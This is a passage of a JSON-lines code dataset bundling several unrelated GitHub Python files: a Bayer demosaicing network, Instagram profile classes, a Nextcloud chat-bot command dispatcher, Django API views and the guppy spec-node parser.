macro_countries_clusters.sort_values(0)\n\nos.chdir('Output')\ncluster_sort.to_csv(\"sample_country_clusters.csv\")\nmacro_cluster_sort.to_csv(\"sample_macro_country_clusters.csv\")","repo_name":"abhig94/CAPP-30254","sub_path":"Project/Pipeline/cluster_muck.py","file_name":"cluster_muck.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9425526366","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport argparse\nfrom tools.model_runner import model_inference\nfrom PIL import Image\nfrom pathlib import Path\n\n# support BayerBG to rgb\n\n\nclass BayerNet(torch.nn.Module):\n\n def __init__(self):\n super(BayerNet, self).__init__()\n self.kernels = torch.tensor([\n [\n [0, 0, 0],\n [0, 1, 0],\n [0, 0, 0],\n ],\n [\n [0, 0.25, 0],\n [0.25, 0, 0.25],\n [0, 0.25, 0],\n ],\n [\n [0.25, 0, 0.25],\n [0, 0, 0],\n [0.25, 0, 0.25],\n ],\n [\n [0, 0, 0],\n [0.5, 0, 0.5],\n [0, 0, 0],\n ],\n [\n [0, 0.5, 0],\n [0, 0, 0],\n [0, 0.5, 0],\n ],\n ]).view(5, 1, 3, 3)\n self.kernel0 = torch.tensor([\n [0, 0, 1.0, 0, 0],\n [0, 1.0, 0, 0, 0],\n [1.0, 0, 0, 0, 0],\n ]).view(3, 5, 1, 1)\n self.kernel1 = torch.tensor([\n [0, 0, 0, 0, 1.0],\n [1.0, 0, 0, 0, 0],\n [0, 0, 0, 1.0, 0],\n ]).view(3, 5, 1, 1)\n self.kernel2 = torch.tensor([\n [0, 0, 0, 1.0, 0],\n [1.0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1.0],\n ]).view(3, 5, 1, 1)\n self.kernel3 = torch.tensor([\n [1.0, 0, 0, 0, 0],\n [0, 1.0, 0, 
0, 0],\n [0, 0, 1.0, 0, 0],\n ]).view(3, 5, 1, 1)\n self.kernels2 = torch.cat((self.kernel0, self.kernel1, self.kernel2, self.kernel3),\n 0).view(12, 5, 1, 1)\n self.reflect_pad = nn.ReflectionPad2d((1, 1, 1, 1))\n\n def unshuffle_dcr(self, x):\n n, c, h, w = x.shape\n x = x.view(n, c, h // 2, 2, w // 2, 2)\n x = x.permute(0, 3, 5, 1, 2, 4).contiguous()\n x = x.view(n, 4 * c, h // 2, w // 2)\n return x\n\n def shuffle_dcr(self, x):\n n, c, h, w = x.shape\n x = x.view(n, 2, 2, c // 4, h, w)\n x = x.permute(0, 3, 4, 1, 5, 2).contiguous()\n x = x.view(n, c // 4, h * 2, w * 2)\n return x\n\n def forward(self, x):\n # x: Bx1xHxW, bayer image\n # y: Bx3xHxW, rgb image\n x_pad = self.reflect_pad(x) # (Bx1x(1+H+1)x(1+W+1))\n x_conv = nn.functional.conv2d(x_pad, self.kernels, stride=1) #[B, 5, H, W]\n x_unshuffle = self.unshuffle_dcr(x_conv) #[B, 4*5, H/2, W/2]\n a = x_unshuffle[:, :5, :, :]\n b = x_unshuffle[:, 5:10, :, :]\n c = x_unshuffle[:, 10:15, :, :]\n d = x_unshuffle[:, 15:20, :, :]\n a_conv = nn.functional.conv2d(a, self.kernel0, stride=1)\n b_conv = nn.functional.conv2d(b, self.kernel1, stride=1)\n c_conv = nn.functional.conv2d(c, self.kernel2, stride=1)\n d_conv = nn.functional.conv2d(d, self.kernel3, stride=1)\n e = torch.cat((a_conv,b_conv,c_conv,d_conv), 1)\n y = self.shuffle_dcr(e) #[B, 3, H, W]\n return y\n\n\nx = torch.randint(0, 256, (1, 1, 1024, 1024), dtype=torch.float32)\n\ninputs = {'x': x.numpy()}\nnp.savez(\"input.npz\", **inputs)\ntorch.jit.trace(BayerNet().eval(), x).save(\"bayer2rgb.pt\")\n\n","repo_name":"sophgo/tpu-mlir","sub_path":"python/samples/bayer2rgb/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":366,"dataset":"github-code","pt":"21"} +{"seq_id":"42080824319","text":"from typing import Any, Dict, Iterator, List, Optional, Union\n\nfrom exceptions import *\nfrom instaloadercontext import InstaloaderContext\n\n\nclass Post:\n\n def __init__(self, context: InstaloaderContext, node: Dict[str, Any],\n owner_profile: Optional['Profile'] = None):\n assert 'shortcode' in node or 'code' in node\n\n self._context = context\n self._node = node\n self._owner_profile = owner_profile\n self._full_metadata_dict = None # type: Optional[Dict[str, Any]]\n self._rhx_gis_str = None # type: Optional[str]\n self._location = None # type: Optional[PostLocation]\n\n\n\n @property\n def owner_username(self) -> str:\n \"\"\"The Post's lowercase owner name.\"\"\"\n return self.owner_profile.username\n\n @property\n def owner_id(self) -> int:\n \"\"\"The ID of the Post's owner.\"\"\"\n return self.owner_profile.userid\n\n @property\n def profile(self) -> str:\n \"\"\"Synonym to :attr:`~Post.owner_username`\"\"\"\n return self.owner_username\n\n\nclass Profile:\n def __init__(self, context: InstaloaderContext, node: Dict[str, Any]):\n assert 'username' in node\n self._context = context\n self._has_public_story = None # type: Optional[bool]\n self._node = node\n self._has_full_metadata = False\n self._rhx_gis = None\n self._iphone_struct_ = None\n if 'iphone_struct' in node:\n # if loaded from JSON with load_structure_from_file()\n self._iphone_struct_ = node['iphone_struct']\n\n @classmethod\n def from_username(cls, context: InstaloaderContext, username: str):\n profile = cls(context, {'username': username.lower()})\n profile._obtain_metadata() # to raise ProfileNotExistException now in case username is invalid\n return profile\n\n @classmethod\n def from_id(cls, context: InstaloaderContext, profile_id: 
int):\n if profile_id in context.profile_id_cache:\n return context.profile_id_cache[profile_id]\n data = context.graphql_query('7c16654f22c819fb63d1183034a5162f',\n {'user_id': str(profile_id),\n 'include_chaining': False,\n 'include_reel': True,\n 'include_suggested_users': False,\n 'include_logged_out_extras': False,\n 'include_highlight_reels': False},\n rhx_gis=context.root_rhx_gis)['data']['user']\n if data:\n profile = cls(context, data['reel']['owner'])\n else:\n raise ProfileNotExistsException(\"No profile found, the user may have blocked you (ID: \" +\n str(profile_id) + \").\")\n context.profile_id_cache[profile_id] = profile\n return profile","repo_name":"javvadasghar/Python-Instagram-Bot","sub_path":"structures.py","file_name":"structures.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30972391481","text":"from nc_helper import NCHelper\nfrom nc_chat import NCChat\nimport os\nimport importlib.util\n\nnc_agent = NCHelper()\n\ncurrent_command = {}\n\nplugin_path = 'ncbot/plugins'\n\nuser_command_cache = {}\n\n\nclass Command:\n\n def __init__(self, chat: NCChat):\n commandstr:str = chat.chat_message\n self.matched_func = False\n self.matched_plugin = False\n self.plname = None\n self.funcname = None\n self.value = None\n self.user_id = chat.user_id\n self.user_name = chat.user_name\n if not commandstr.startswith('!'):\n return\n try:\n commandpair = commandstr.split(' ',1)\n commanddetail = commandpair[0][1:].split(':')\n self.plname = commanddetail[0]\n self.funcname = commanddetail[1]\n self.value = commandpair[1]\n except Exception:\n pass\n\n\n if self.plname in current_command:\n self.matched_plugin = True\n if self.funcname in current_command[self.plname]:\n self.matched_func = True\n self.func = current_command[self.plname][self.funcname]['func'] \n\n\n def execute(self):\n try:\n return self.func(self.user_id, self.user_name, self.value)\n except Exception as e:\n return 'Something wrong happened! 
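# --- Editor's illustration (hedged sketch; not part of the original record) ---
# Profile.from_id above is a memoizing factory: look up a cache keyed by id,
# build on a miss, store, return. The same shape in miniature (the class and
# attribute names below are illustrative stand-ins, not the Instaloader API):
class _Context:
    def __init__(self):
        self.profile_id_cache = {}

class _Profile:
    def __init__(self, context, node):
        self._node = node

    @classmethod
    def from_id(cls, context, profile_id):
        if profile_id in context.profile_id_cache:
            return context.profile_id_cache[profile_id]
        profile = cls(context, {'id': profile_id})  # stands in for the GraphQL fetch
        context.profile_id_cache[profile_id] = profile
        return profile

ctx = _Context()
assert _Profile.from_id(ctx, 7) is _Profile.from_id(ctx, 7)  # second call is a cache hit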
Please try again later.'\n\n\ndef get_default_desc():\n desc = \"You should type !Plugin:Function to talk with me.\\n\\nCurrent supported plugins are:\\n\"\n for key in current_command:\n desc += key+'\\n'\n desc += \"\\nType !Plugin to see detail about plugin.\\n\"\n desc += \"The last command will be remembered if capable, so you should not type the command first next time.\"\n return desc\n\n\ndef get_plugin_desc(plname):\n desc = 'Supported commands are:\\n'\n plugin = current_command[plname]\n for key in plugin:\n desc += f'{key}: {plugin[key][\"desc\"]}\\n'\n desc += f'type !{plname}:command input to use it.'\n return desc\n\n\ndef find_last_command(chat: NCChat):\n if not chat.chat_message.startswith('!'):\n key = f'command_{chat.user_id}'\n if key in user_command_cache:\n command = user_command_cache[key]\n chat.chat_message = f'{command} {chat.chat_message}'\n\n\ndef save_last_command(chat: NCChat, command: Command):\n if current_command[command.plname][command.funcname]['remember']:\n key = f'command_{chat.user_id}'\n user_command_cache[key] = f'!{command.plname}:{command.funcname}'\n return True\n return False\n\n\ndef dispatch(chat: NCChat):\n ret = 'test'\n #nc_agent.lock_conversation(chat.conversation_token)\n\n find_last_command(chat)\n command = Command(chat)\n if command.matched_func:\n ret = command.execute()\n if save_last_command(chat, command):\n ret += f'\\n\\n(The command !{command.plname}:{command.funcname} is remembered, type without command to continue using this function. Otherwise type other commands.)'\n elif command.matched_plugin:\n ret = get_plugin_desc(command.plname)\n else:\n ret = get_default_desc()\n #nc_agent.unlock_conversation(chat.conversation_token)\n chat.response = ret\n\n\ndef register(plname, funcname, desc, func, remember_command):\n if plname in current_command:\n current_command[plname][funcname] = {'desc':desc, 'func':func, 'remember':remember_command}\n else:\n current_command[plname] = {funcname: {'desc':desc, 'func':func, 'remember':remember_command}}\n\n\ndef load_plugin(path):\n for filename in os.listdir(path):\n tmppath = os.path.join(path, filename)\n if os.path.isfile(tmppath):\n if filename.endswith('.py') and not filename.startswith('__init'):\n spec = importlib.util.spec_from_file_location(filename[:-3], os.path.join(path, filename))\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n elif os.path.isdir(tmppath):\n load_plugin(tmppath)\n\n\n\n","repo_name":"CrazyShipOne/nextcloud_talk_pybot","sub_path":"ncbot/command/commander.py","file_name":"commander.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"36979755975","text":"from django.urls import path\nfrom . 
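# --- Editor's illustration (hedged sketch; not part of the original record) ---
# load_plugin() above is the standard importlib recipe for executing a module
# from a file path, which lets plugins self-register at import time. The core
# of that recipe, extracted (the example path is hypothetical):
import importlib.util

def load_module_from_path(path, name):
    spec = importlib.util.spec_from_file_location(name, path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)  # runs the file; register() calls fire here
    return module

# load_module_from_path('ncbot/plugins/hello.py', 'hello')  # hypothetical plugin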
import views\n\nurlpatterns = [\n path('', views.product_list, name='home'),\n path('api/data', views.api_data, name='api-data'),\n path('api/district', views.api_district, name='api-district'),\n path('api/chandaKatha', views.api_chandaKatha, name='api-chandakatha')\n\n\n]\n","repo_name":"TajalTechnology/Django-vue-api-AdvanceSearch","sub_path":"Bangla_idoms/model_main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41396612232","text":"##\n# Specification entity object\n#\n# Collects information about a particular system entity or aspect.\n#\n# The entity is of a general kind\n# It is defined by the particular aspects defined for it\n# The aspects must be 'compatible', which can be relatively checked.\n# The specobject is used for:\n# * generating tests\n# * generating docs\n# * generating help\n# * by creating docstrings\n# * by providing interactive help\n#\n# For test generation, it will delegate to test implementators.\n# For doc generation, it will delegate to doc implementators.\n#\n# The functionality needed here is therefore limited.\n#\n# name\n# aspects\n#\n# There is one predefine root\n# - should we call it Universe?\n#\n# The name can be full, a dotted name, or the short, last part.\n#\n# The name is treated as an aspect.\n#\n# Each aspect definition has a primary kind\n\n# Aspect kinds\n\n\nfrom guppy.gsl.Exceptions import *\n\n\nclass SpecObject:\n def __init__(self, mod):\n self.mod = mod\n\n##\n# Specification environment\n# Collects specifications from several files\n# Maps names to specification objects\n\n\nclass SpecEnv:\n def __init__(self, mod):\n self.mod = mod\n self.unknown_nodes = []\n self.files = []\n\n def visit_default(self, node):\n print('add_unknown', node.tag)\n self.unknown_nodes.append(node)\n\n def visit_file(self, node):\n print('visit_file')\n file = FileEnv(self, node)\n self.files.append(file)\n\n def get_predefined_subjects(self, env):\n return (GuppyWorld(env),)\n\n\nclass FileEnv:\n def __init__(self, env, node):\n mod = env.mod\n self.mod = mod\n self.name = self.filename = node.arg\n self.subjects = {}\n for s in env.get_predefined_subjects(self):\n self.subjects[s.name] = s\n\n file = Subject(self, node, self.name)\n\n node.children_accept(file)\n\n def visit_aspects_of(self, node):\n name = node.arg\n subject = self.find_subject(node, name)\n subject.add_aspects(node)\n\n def def_subject(self, node, name, subject):\n if name in self.subjects:\n self.error_node(node, 'Redefinition of %r.' % name)\n self.error_node(self.subjects[name].node,\n 'Previous definition of %r.' % name)\n else:\n self.subjects[name] = subject\n\n def error_node(self, node, msg, exception=None):\n index = node.index\n lineno = index + 1\n print('%s:%s:' % (self.filename, lineno))\n print(' %r' % self.get_line(index))\n print(' %s' % msg)\n print()\n\n def find_subject(self, node, name):\n subject = self.subjects.get(name)\n if subject is None:\n self.error_node(node, 'No such subject: %r.' 
% name)\n return subject\n\n def get_line(self, index):\n try:\n with open(self.filename) as f:\n text = list(f.readlines())[index].rstrip()\n except Exception:\n text = None\n return text\n\n def get_subject(self, name):\n subject = self.subjects.get(name)\n if subject is None:\n subject = self.subjects[name] = Subject(self, name)\n return subject\n\n def get_aspect_subject(self, env, node):\n name = env.name+'::'+node.tag\n return self.get_subject(name)\n\n\nclass Subject:\n def __init__(self, file, node, name):\n self.file = file\n self.node = node\n self.name = name\n self.aspects = []\n\n def visit_default(self, node):\n of = node.tag.endswith('_of')\n name = node.arg\n define = name.startswith(':')\n if define:\n if of:\n\n self.file.error_node(node, \"Both 'of' and '::'.\")\n name = name[1:].strip()\n if of:\n ofsubject = self.file.find_subject(node, name)\n subject = self.new_subject_of(node, ofsubject)\n else:\n subject = Subject(self.file, node, name)\n if define:\n self.file.def_subject(node, name, subject)\n self.aspects.append(subject)\n node.children_accept(subject)\n\n def new_subject_of(self, node, of):\n tag = node.tag\n if tag == 'aspects_of':\n return AspectsOf(self.file, node, of)\n else:\n return SubjectOf(self.file, node, of)\n\n\nclass AspectsOf(Subject):\n def __init__(self, file, node, of):\n self.node = node\n self.of = of\n self.aspects = []\n\n def visit_default(self, node):\n self.of.visit_default(node)\n\n\nclass SubjectOf(Subject):\n def __init__(self, file, node, of):\n self.node = node\n self.of = of\n self.aspects = []\n\n\nclass GuppyWorld(Subject):\n def __init__(self, env):\n self.file = env\n self.name = \"Guppy World\"\n self.node = None\n self.aspects = []\n\n\n##\n# A node represented with argument splitted in components of the form:\n# .tag: arg\n# text\n# ..child\n# ...\n# ..child\n# ...\n#\n# @param tag the text of the first line before the colon\n# @param arg the text of the first line after the colon (stripped)\n# @param text the text after the the first line before the first children\n# @param children the child nodes\n# @param index line index\n# @param src describes the source\n\nclass SpecNode(object):\n __slots__ = 'tag', 'arg', 'children', 'index', 'src'\n\n def __init__(self, tag, arg, children=(), index=0, src=None):\n self.tag = tag\n self.arg = arg\n self.children = tuple(children)\n self.index = index\n self.src = src\n\n def __repr__(self):\n return '%s(%r,%r,%r)' % (\n self.__class__.__name__, self.tag, self.arg, self.children)\n\n def __str__(self):\n return '%s(%r,%r,%s)' % (\n self.__class__.__name__, self.tag, self.arg,\n '(%s)' % (','.join([str(c) for c in self.children])))\n\n def arg_accept(self, visitor, prefix='visit_'):\n if self.arg:\n node = SpecNode('text', self.arg, (), self.index)\n node.accept(visitor, prefix)\n self.children_accept(visitor, prefix)\n\n def copy(self, tag=None, arg=None, children=None, index=None, src=None):\n if tag is None:\n tag = self.tag\n if arg is None:\n arg = self.arg\n if children is None:\n children = self.children\n if index is None:\n index = self.index\n if src is None:\n src = self.src\n return self.__class__(tag, arg, children, index, src)\n\n def children_accept(self, visitor, prefix='visit_'):\n for c in self.children:\n c.accept(visitor, prefix)\n\n def accept(self, visitor, prefix='visit_'):\n m = getattr(visitor, (prefix+self.tag), None)\n if m is None:\n m = getattr(visitor, (prefix+'default'), None)\n if m is None:\n msg = 'accept: unknown: %r, %r in %r' % (\n prefix, 
self.tag, visitor)\n print(msg)\n raise ValueError(msg)\n return\n m(self)\n\n def error(self, msg, node=None):\n if node is None:\n node = self\n node.src.error(msg, node)\n\n def get_text(self):\n \" Get the total text of all text children, joined with and ended with '\\n' \"\n text = []\n for c in self.children:\n if c.tag == 'text':\n text.append(c.arg)\n if not c.arg.endswith('\\n'):\n text.append('\\n')\n return ''.join(text)\n\n def get_arg(self):\n arg = self.arg.strip()\n if arg.startswith(':'):\n arg = arg[1:].strip()\n return arg\n\n def get_arglist(self):\n arg = self.arg\n if arg.startswith(':'):\n arg = arg[1:]\n names = [x.strip() for x in arg.split(',')]\n if names == ['']:\n names = []\n return names\n\n def get_arg_children(self):\n if self.arg:\n children = [SpecNode('text', self.arg, (), self.index, self.src)]\n children.extend(self.children)\n else:\n children = self.children\n return children\n\n def get_arg_rest(self, nostrip=0):\n arg = self.arg\n if not nostrip:\n arg = arg.strip()\n return arg, self.children\n\n def get_arg_norest(self):\n ''' Get the arg as by self.arg,\n but make sure there are no more children.\n '''\n if self.children:\n raise SyntaxError('No children nodes expected in node: %s' % self)\n return self.arg.strip()\n\n def get_namearg(self):\n ''' Get the argument in the form of a name\n It is the argument stripped.\n And not allowed to contain : or , or new line.\n '''\n name = self.arg.strip()\n if '\\n' in name or ':' in name or ',' in name:\n raise SyntaxError('Invalid name: %r' % name)\n return name\n\n def split_attrs(self, tag=None, attrdict=False):\n if tag is None:\n tag = self.tag\n if attrdict:\n attrs = {}\n\n def addattr(tag, attr, node):\n if tag in attrs:\n node.error('Duplicate attribute: %s' % attr)\n else:\n attrs[tag] = attr\n else:\n attrs = []\n\n def addattr(tag, attr, node):\n attrs.append((tag, attr))\n children = []\n for ch in self.children:\n if ch.tag == \"with\":\n for opt in ch.children:\n if opt.arg:\n arg = opt.arg\n else:\n self.error('Bad attribute, no argument.', opt)\n if opt.children:\n self.error(\n 'Expected no children to attribute.', opt.children[0])\n if opt.arg:\n addattr(opt.tag, arg, opt)\n elif ch.tag[-1:] == '=':\n addattr(ch.tag[:-1], ch.arg, ch)\n else:\n children.append(ch)\n if len(children) == len(self.children):\n node = self\n else:\n node = self.__class__(\n tag, self.arg, children, self.index, self.src)\n return node, attrs\n\n\nclass Source:\n def __init__(self, name, lines=None, string=None, nostrip=0, debug=0, max_errors=10):\n self.filename = name\n self.lines = lines\n self.string = string\n self.nostrip = nostrip\n self.debug = debug\n self.error_reports = []\n self.max_errors = max_errors\n self.num_warnings = 0\n self.num_errors = 0\n\n def errmsg_context(self, context):\n linetext = ''\n filename = ''\n if context is not None:\n if hasattr(context, 'index'):\n index = context.index\n src = context.src\n else:\n index = context\n src = self\n if src is not None:\n filename = src.filename\n linetext = src.get_line(index=index)\n print('%s:%s:' % (filename, index+1))\n if linetext:\n print(' %s' % linetext)\n\n def error(self, message, context=None, exception=None, more=(), harmless=0):\n self.error_reports.append(\n (message, context, exception, more, harmless))\n if harmless:\n self.num_warnings += 1\n else:\n self.num_errors += 1\n\n self.errmsg_context(context)\n if harmless:\n print('* %s' % message)\n else:\n print('*** %s' % message)\n print()\n\n for msg, ctx in more:\n 
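# --- Editor's illustration (hedged sketch; not part of the original record) ---
# SpecNode.accept() above is getattr-based visitor dispatch: it resolves
# 'visit_' + tag on the visitor and falls back to visit_default. The same
# mechanism in miniature:
class _Node:
    def __init__(self, tag, arg):
        self.tag, self.arg = tag, arg

    def accept(self, visitor, prefix='visit_'):
        m = getattr(visitor, prefix + self.tag, None) or getattr(visitor, prefix + 'default')
        return m(self)

class _Printer:
    def visit_text(self, node):
        print('text:', node.arg)

    def visit_default(self, node):
        print('unhandled tag:', node.tag)

_Node('text', 'hello').accept(_Printer())  # prints: text: hello
_Node('file', 'x.gsl').accept(_Printer())  # prints: unhandled tag: file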
self.errmsg_context(ctx)\n print(' %s' % msg)\n print()\n\n if self.debug:\n import pdb\n pdb.set_trace()\n else:\n if self.num_errors >= self.max_errors:\n raise TooManyErrors('Too many errors, giving up')\n if exception is not None:\n raise exception\n\n def get_line(self, index):\n if self.lines is None:\n if self.string is None:\n if self.filename:\n try:\n with open(self.filename) as f:\n self.string = f.read()\n except Exception:\n return ''\n else:\n return ''\n self.lines = self.string.split('\\n')\n return self.lines[index]\n\n\nclass _GLUECLAMP_:\n\n _chgable_ = 'nodemap', 'SpecNode'\n\n _imports_ = (\n '_parent:DottedTree',\n '_root:re',\n '_root:os',\n )\n\n node_aliases_defs = (\n ('attr', 'attribute'),\n ('c', 'comment'),\n ('cond', 'condition'),\n ('d', 'description'),\n ('dwh', 'description_with_header'),\n ('eg', 'example'),\n ('fop', 'function_operator'),\n ('iop', 'inplace_operator'),\n ('ka', 'key_arg'),\n ('op', 'operator'),\n ('rop', 'reverse_operator'),\n ('t', 'text'),\n )\n\n def _get_node_aliases(self):\n return dict(self.node_aliases_defs)\n\n def _get_reverse_node_aliases(self):\n # Used to make names shorter\n return dict([(v, k) for k, v in self.node_aliases_defs])\n\n def _get_is_not_ascii(self):\n return self.re.compile(eval(r'u\"[\\u0080-\\uffff]\"')).search\n\n ##\n # @return A tuple of predefined subjects.\n\n def get_predefined_subjects(self):\n return (GuppyWorld(self),)\n\n ##\n # Parses a file and makes a tree of nodes\n # @param file name of file containing a dotted tree\n # @return a SpecNode object\n # @more\n # First tag is special.\n # We don't interpret the first line of the file,\n # but uses a special file tag.\n\n def node_of_file(self, file, nostrip=0):\n src = Source(name=file, nostrip=nostrip)\n dtree = self.DottedTree.parse_file(file, src)\n tag = 'file'\n arg = file\n text = dtree.tag.strip()\n children = self.nodes_of_dforest(dtree.children, src)\n index = dtree.index\n return self.node_of_tatci(tag, arg, text, children, index, src)\n\n def node_of_string(self, string, name='', nostrip=0):\n dtree = self.DottedTree.parse_string(string)\n tag = 'string'\n arg = name\n src = Source(name=name, string=string, nostrip=nostrip)\n text = dtree.tag.strip()\n index = dtree.index\n children = self.nodes_of_dforest(dtree.children, src)\n return self.node_of_tatci(tag, arg, text, children, index, src)\n\n def node_of_dtree(self, dtree, src):\n tag = dtree.tag\n textpos = tag.find('\\n')\n if textpos == -1:\n textpos = len(tag)\n\n equpos = tag.find('=', 0, textpos)\n colonpos = tag.find(':', 0, textpos)\n if equpos != -1 and (colonpos == -1 or equpos < colonpos):\n tag, arg = (tag[:equpos].strip()+'=',\n tag[equpos+1:].strip())\n else:\n if colonpos == -1:\n if not ' ' in tag[:textpos] or textpos >= len(tag.rstrip()):\n colonpos = textpos\n else:\n raise SyntaxError(\n 'No colon in spaced tag in node %s' % dtree)\n tag, arg = (tag[:colonpos].strip(),\n tag[colonpos+1:]\n )\n if tag in self.node_aliases:\n tag = self.node_aliases[tag]\n tag = tag.replace(' ', '_')\n if tag != 'text' and not src.nostrip:\n arg = arg.strip()\n\n children = self.nodes_of_dforest(dtree.children, src)\n return self.node_of_taci(tag, arg, children, dtree.index, src)\n\n def nodes_of_dforest(self, dforest, src):\n onodes = [self.node_of_dtree(c, src) for c in dforest]\n nodes = []\n for node in onodes:\n if node.tag != 'include':\n nodes.append(node)\n continue\n filename = node.arg.strip()\n filename = self.os.path.join(self.os.path.dirname(src.filename),\n filename)\n 
node = self.node_of_file(filename, nostrip=src.nostrip)\n nodes.extend(node.children)\n return tuple(nodes)\n\n def _get_node_of_taci(self):\n return SpecNode\n\n def node_of_tatci(self, tag, arg, text, children=(), index=0, src=None):\n if text:\n if tag == 'text':\n if arg:\n arg = arg + '\\n' + text\n else:\n arg = text\n else:\n children = (self.node_of_taci(\n 'text', text, (), index, src),) + children\n return self.node_of_taci(tag, arg, children, index, src)\n\n def node_of_text(self, text):\n # Returns a node that is either\n # - a 'text' node, if text was all ascii\n # - a 'char' node, if text was a single non-ascii\n # - a 'block' with children being a sequence of char and text nodes,\n # if text contained ascii and non-ascii characters\n nodes = self.nodes_of_text(text)\n if len(nodes) == 1:\n return nodes[0]\n else:\n return self.node_of_taci('block', '', nodes)\n\n def nodes_of_text(self, text):\n # Returns a sequence of nodes, encoding text.\n nodes = []\n if self.is_not_ascii(text):\n chars = []\n for char in text:\n no = ord(char)\n if no < 128:\n chars.append(char)\n else:\n if chars:\n nodes.append(self.node_of_taci('text', ''.join(chars)))\n chars = []\n nodes.append(self.node_of_taci('char', str(no)))\n if chars:\n nodes.append(self.node_of_taci('text', ''.join(chars)))\n else:\n nodes.append(self.node_of_taci('text', text))\n return nodes\n\n def main(self):\n root = self._root\n\n specdir = root.os.path.join(\n root.os.path.dirname(root.os.path.realpath(__file__)),\n '../../specs')\n main_dt_name = root.os.path.join(specdir, \"docexample.gsl\")\n if not root.os.path.exists(main_dt_name):\n print('%s does not exist, skipping test' % main_dt_name)\n return\n\n env = self.SpecEnv(self)\n\n node = self.node_of_file(main_dt_name)\n node.accept(env)\n\n def print_doc(self, dt):\n self.print_doc()\n\n def unparse_head(self, level, tag, arg, text):\n head = tag\n if arg:\n head = head + ': ' + arg\n if text:\n head = head + '\\n' + text\n tag = self.DottedTree.unparse_tag(level, head)\n return tag\n\n\ndef test_main():\n from guppy import Root\n root = Root()\n\n root.guppy.gsl.SpecNodes.main()\n","repo_name":"zhuyifei1999/guppy3","sub_path":"guppy/gsl/SpecNodes.py","file_name":"SpecNodes.py","file_ext":"py","file_size_in_byte":18920,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"21"} +{"seq_id":"34356836331","text":"import os\n\n# Root directory where this clone of the Toltec repo lives\nGIT_DIR = os.path.normpath(os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n\n# Directory where the tooling scripts are stored\nSCRIPTS_DIR = os.path.normpath(os.path.join(os.path.dirname(__file__), \"..\"))\n\n# Directory where recipes can be found\nRECIPE_DIR = os.path.join(GIT_DIR, \"package\")\n\n# Working directory for building recipes\nWORK_DIR = os.path.join(GIT_DIR, \"build\", \"package\")\n\n# Directory used for storing built packages\nREPO_DIR = os.path.join(GIT_DIR, \"build\", \"repo\")\n","repo_name":"toltec-dev/toltec","sub_path":"scripts/toltec/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":581,"dataset":"github-code","pt":"21"} +{"seq_id":"24378052850","text":"from django.http import JsonResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nimport shutil\nimport os\nfrom django.conf import settings\nfrom django.core.files.storage import default_storage\nfrom rest_framework.pagination 
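# --- Editor's illustration (hedged sketch; not part of the original record) ---
# The paths.py record above derives every directory from __file__ via os.path;
# normpath is what collapses the '..' hops back to the repository root:
import os
print(os.path.normpath(os.path.join('/repo/scripts/toltec', '..', '..')))  # /repo on POSIX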
import PageNumberPagination\nfrom rest_framework import filters\nfrom rest_framework import generics\n\nfrom api.models import Videos, Sessions, Cameras, CameraAngles, TypicalChild, AntypicalChild\nfrom api.serializers import VideosSerializer\n\n\n# get all videos for typical children\n@api_view(['GET'])\ndef allTVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.all().exclude(tChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n# get all videos of antypical children\n@api_view(['GET'])\ndef allATVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.all().exclude(atChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n\n# get all videos of a session\n@api_view(['GET'])\ndef sessionVideos(request, pk):\n session = Sessions.objects.get(id=pk)\n video_list = Videos.objects.filter(session__exact=session)\n serializer = VideosSerializer(video_list, many=True)\n return Response(serializer.data)\n\n\n# get all sliced videos of typical children\n@api_view(['GET'])\ndef allTSlicedVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.filter(sliced__exact=True).exclude(tChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n# get all sliced videos of atypical children\n@api_view(['GET'])\ndef allATSlicedVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.filter(sliced__exact=True).exclude(atChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n\n# get all unsliced videos of typical children\n@api_view(['GET'])\ndef allTUnslicedVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.filter(sliced__exact=False).exclude(tChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n# get all unsliced videos of typical children\n@api_view(['GET'])\ndef allATUnslicedVideos(request):\n paginator = PageNumberPagination()\n paginator.page_size = 20\n\n video_list = Videos.objects.filter(sliced__exact=False).exclude(atChild__isnull=True).order_by('-id')\n result_page = paginator.paginate_queryset(video_list, request)\n serializer = VideosSerializer(result_page, many=True)\n return 